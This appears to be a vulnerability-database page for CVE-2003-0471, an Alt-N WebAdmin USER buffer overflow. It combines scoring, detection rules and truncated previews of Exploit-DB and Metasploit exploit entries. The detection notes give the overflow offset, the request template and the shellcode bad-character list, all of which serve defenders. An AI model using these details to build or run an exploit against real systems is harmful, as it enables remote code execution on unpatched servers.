CVE-2003-0471
published 2003-08-07CVE-2003-0471: Buffer overflow in WebAdmin.exe for WebAdmin allows remote attackers to execute arbitrary code via an HTTP request to WebAdmin.dll with a long USER argument.
PriorityP352high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
60.95%
99.0th percentile
Buffer overflow in WebAdmin.exe for WebAdmin allows remote attackers to execute arbitrary code via an HTTP request to WebAdmin.dll with a long USER argument.
Detection & IOCsextracted from sources · hover to see the quote
commandUser=<168-byte overflow>+<ret addr>+<shellcode>&Password=foo&languageselect=en&Theme=Heavy&Logon=Sign+In↗
bytes↗
\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c
- →Detect exploit attempts by matching HTTP POST requests to /WebAdmin.DLL?View=Logon with an oversized User= parameter in the POST body (overflow offset is 168 bytes before the return address). ↗
- →Alert on HTTP requests to /WebAdmin.DLL where the Content-Type is application/x-www-form-urlencoded and the User= POST field length exceeds 168 bytes. ↗
- →Fingerprint vulnerable versions by checking HTTP response body for the pattern /v2\.0\.4|v2\.0\.3|v2\.0\.2|v2\.0\.1/ on the WebAdmin service (default port 1000). ↗
- →Monitor for exploitation of WebAdmin on TCP port 1000, which is the default service port targeted by all known exploit variants. ↗
- →Payload bad characters for this exploit are \x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c; shellcode in the User= field will avoid these bytes, which can aid in distinguishing encoded shellcode from normal traffic. ↗
- →Successful exploitation results in code execution with SYSTEM-level privileges; monitor for WebAdmin.exe spawning unexpected child processes (e.g., cmd.exe) on Windows hosts. ↗
- ·The exploit targets WebAdmin versions 2.0.1 through 2.0.4; version 2.0.5 is the patched release. Return addresses are version-specific and hardcoded per DLL build — using the wrong target offset will crash the service without code execution. ↗
- ·The download-and-execute shellcode variant (exploit 22834) crashes the server after execution; an attacker would need to restart the WebAdmin service to restore access. ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Alt-N WebAdmin - USER Buffer Overflow (Metasploit)
exploitdb·2010-02-15
CVE-2003-0471 Alt-N WebAdmin - USER Buffer Overflow (Metasploit)
Alt-N WebAdmin - USER Buffer Overflow (Metasploit)
---
##
# $Id: altn_webadmin.rb 8498 2010-02-15 00:48:03Z hdm $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Alt-N WebAdmin USER Buffer Overflow',
'Description' => %q{
Alt-N WebAdmin is prone to a buffer overflow condition. This
is due to insufficient bounds checking on the USER
parameter. Successful exploitation could result in code
execution with SYSTEM level privileges.
},
'Author' => [ 'MC' ],
'License' => MSF_LICENSE,
'Version' => '$Revision: 8498 $',
'References' =>
[
[ 'CVE', '20
Exploit-DB
Alt-N WebAdmin 2.0.4 - USER Buffer Overflow (Metasploit)
exploitdb·2005-09-11
CVE-2003-0471 Alt-N WebAdmin 2.0.4 - USER Buffer Overflow (Metasploit)
Alt-N WebAdmin 2.0.4 - USER Buffer Overflow (Metasploit)
---
##
# This file is part of the Metasploit Framework and may be redistributed
# according to the licenses defined in the Authors field below. In the
# case of an unknown or missing license, this file defaults to the same
# license as the core Framework (dual GPLv2 and Artistic). The latest
# version of the Framework can always be obtained from metasploit.com.
##
package Msf::Exploit::altn_webadmin;
use base "Msf::Exploit";
use strict;
use Pex::Text;
my $advanced = { };
my $info =
{
'Name' => 'Alt-N WebAdmin USER Buffer Overflow',
'Version' => '$Revision: 1.1 $',
'Authors' => [ 'y0 [at] w00t-shell.net', ],
'Arch' => [ 'x86' ],
'OS' => [ 'win32', 'winnt', 'win2000', 'winxp', 'win2003' ],
'Priv' => 0,
'AutoOpts' => { 'EXITFUNC'
Exploit-DB
Alt-N WebAdmin 2.0.x - 'USER' Remote Buffer Overflow (2)
exploitdb·2003-06-24
CVE-2003-0471 Alt-N WebAdmin 2.0.x - 'USER' Remote Buffer Overflow (2)
Alt-N WebAdmin 2.0.x - 'USER' Remote Buffer Overflow (2)
---
// source: https://www.securityfocus.com/bid/8024/info
Alt-N WebAdmin is prone to a buffer overflow condition. This is due to insufficient bounds checking on the USER parameter. Successful exploitation could result in code execution with SYSTEM level privileges.
/* WebAdmin.dll remote download exec shellcode. Works on 2.0.3 and 2.0.4 all windows sp's.
Oh and my previous exploit, i'm an idiot and 2.0.5 *is* the patch, heh.
This shellcode was used by ThreaT in his vulnreg.reg exploit, it works quite nicely.
Look at the bottom of the code for some trojan.exe idea's. That one i found somewhere but
i can't remember.
shellcode has one minor suck point, it shows a window on the target host, oh and the exploit
crashes the server, so
Exploit-DB
Alt-N WebAdmin 2.0.x - 'USER' Remote Buffer Overflow (1)
exploitdb·2003-06-24
CVE-2003-0471 Alt-N WebAdmin 2.0.x - 'USER' Remote Buffer Overflow (1)
Alt-N WebAdmin 2.0.x - 'USER' Remote Buffer Overflow (1)
---
// source: https://www.securityfocus.com/bid/8024/info
Alt-N WebAdmin is prone to a buffer overflow condition. This is due to insufficient bounds checking on the USER parameter. Successful exploitation could result in code execution with SYSTEM level privileges.
/* WebAdmin.dll remote proof of concept 2.0.4 version.. tried finding 2.0.5 but all versions
were already patched from the dl sites... this was tested on a win2ksp2 server, i suggest
using better shellcode this is just something i know works, just opens a cmd.exe prompt
on the victim box. I imagine this won't be too much harder to exploit with 2.0.5 unpatched
this took me about 1 hour to write and it was my first remote win32 exploit, thank you alt-n :D.
word to Mark
Metasploit
Alt-N WebAdmin USER Buffer Overflow
metasploit
Alt-N WebAdmin USER Buffer Overflow
Alt-N WebAdmin USER Buffer Overflow
Alt-N WebAdmin is prone to a buffer overflow condition. This is due to insufficient bounds checking on the USER parameter. Successful exploitation could result in code execution with SYSTEM level privileges.
No writeups or analysis indexed.
http://marc.info/?l=bugtraq&m=105647081418155&w=2http://marc.info/?l=bugtraq&m=105648385900792&w=2http://www.osvdb.org/2207http://www.securityfocus.com/bid/8024http://marc.info/?l=bugtraq&m=105647081418155&w=2http://marc.info/?l=bugtraq&m=105648385900792&w=2http://www.osvdb.org/2207http://www.securityfocus.com/bid/8024
2003-08-07
Published